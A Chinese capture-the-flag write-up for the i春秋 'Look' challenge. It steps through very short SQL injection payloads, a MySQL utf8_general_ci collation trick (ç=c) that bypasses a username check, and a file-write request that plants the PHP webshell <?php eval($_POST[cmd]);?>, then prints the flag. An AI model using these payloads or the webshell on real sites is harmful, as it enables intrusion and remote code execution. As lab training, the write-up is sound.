i春秋-Look(sql字符集、超短sql注入、写入shell)

练习平台地址

竞赛中心

题目描述

题目内容

一片空白

F12检查

元素无信息

响应头中发现了提示

尝试对verify参数进行sql注入

get传值有回显应该是get注入

尝试注入

提示verify long应该是太长了

更改payload(超短sql语句)

''*1

''&1

''%1

''=0

访问5211ec9dde53ee65bb02225117fba1e1.php

F12检查

元素无信息

响应头中又发现了提示

访问.viminfo配置文件(目录扫描也可以扫描到,可跳过前面步骤)

访问备份文件

代码分析

1.起初以为是宽字节注入%df%27,但是其中第一个if判断远程IP只是一个幌子无法伪造

2.接着看程序逻辑 需要输入非 Bctf2O(大写O)16但进入数据库查询又当作是Bctf2O16的一个字符串,结合题目提示的mysql字符集
MYSQL 中 utf8_unicode_ci 和 utf8_general_ci 两种编码格式, utf8_general_ci不区分大小写, Ä = A, Ö = O, Ü = U 这三种条件都成立, 对于utf8_general_ci下面的等式成立:ß = s ,但是,对于utf8_unicode_ci下面等式才成立:ß = ss

绕过方式

使用ç=c 或者ô=o

payload

?usern3me=Bçtf2O16

访问c3368f5eb5f8367fd548b228bee69ef2.php

代码分析

相关函数

file_put_contents:

将一个字符串写入文件中

php 复制代码
<?php
$file = 'example.txt';
$data = '这是一些文本';
file_put_contents($file, $data);
?>

file_get_contents:

将整个文件的内容读入一个字符串中

php 复制代码
<?php
echo file_get_contents("test.txt");
?>

功能分析

上个页面的usern3me的内容是我们可控的,我们可以直接写php代码,这样写的php代码就进入了我们给的文件,然后RCE就可以了

构造payload

?filename=1.php&path=http://127.0.0.1/5211ec9dde53ee65bb02225117fba1e1.php?usern3me=\<?php%2520eval($_POST[cmd]);?>

蚁剑连接

flag

flag{8d15ba42-bfcd-4587-b111-52fbca0494f8}

注意事项

在mysql字符集中,ç和c,ô和o是相等的

相关推荐
闻缺陷则喜何志丹6 小时前
【BFS 动态规划】P12382 [蓝桥杯 2023 省 Python B] 树上选点|普及+
c++·蓝桥杯·动态规划·宽度优先·洛谷
Dreamboat¿6 小时前
SQL注入攻防深度解析:从预编译绕过到高级注入技术
网络安全
爱学习的小牛12 小时前
三年网络安全经验,备考OSCP!
安全·web安全·网络安全·渗透测试·offsec·oscp
内心如初16 小时前
16_等保系列之等级保护、风险评估和安全测评三者的区别
网络安全·等保测评·等保测评从0-1·等保测评笔记
上海云盾第一敬业销售16 小时前
构建坚不可摧的网站安全防护策略
安全·web安全·ddos
醒醒酒17 小时前
sqli-labs Less1-4 新手修仙版
数据库·计算机网络·安全·web安全·网络安全·oracle
Whoami!19 小时前
⓫⁄₅ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 利用PowerShell获取敏感信息
网络安全·信息安全·powershell·windows日志
白山云北诗19 小时前
一文读懂什么是CC攻击
网络·数据库·tcp/ip·网络安全·cc·cc攻击·请求数
闻缺陷则喜何志丹20 小时前
【数论】P12191 [蓝桥杯 2025 省研究生组] 01 串|普及+
c++·数学·蓝桥杯·数论·洛谷
阿钱真强道20 小时前
基于openssl的sm4加密,加密数据,验证OK
linux·网络协议·网络安全